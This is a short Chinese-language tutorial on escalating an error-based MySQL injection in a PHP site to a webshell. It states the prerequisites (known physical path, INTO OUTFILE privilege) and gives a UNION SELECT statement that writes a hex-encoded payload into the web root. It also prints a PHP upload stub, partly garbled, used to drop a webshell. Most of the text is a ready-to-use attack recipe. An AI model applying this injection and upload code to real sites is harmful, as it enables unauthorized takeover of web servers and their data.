关于MySQL注入漏洞到获取webshell

关于PHP网站报错性注入拿shell的方法，定位到报错在某个字段上的利用方式：

条件1： 爆出了网站的物理路径

条件2：MySQL具有into outfile权限

 

SQL语句为：

假如字段为2：

union+select+1,payload的十六进制,3,4,5+into+outfile+'/var/www/html/data/1.php';

 

payload:

';echo '
';echo '

';echo '

';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload !!!

'; }else { echo 'Upload !!!

'; }}?>

 

访问1.PHP上传webshell即可。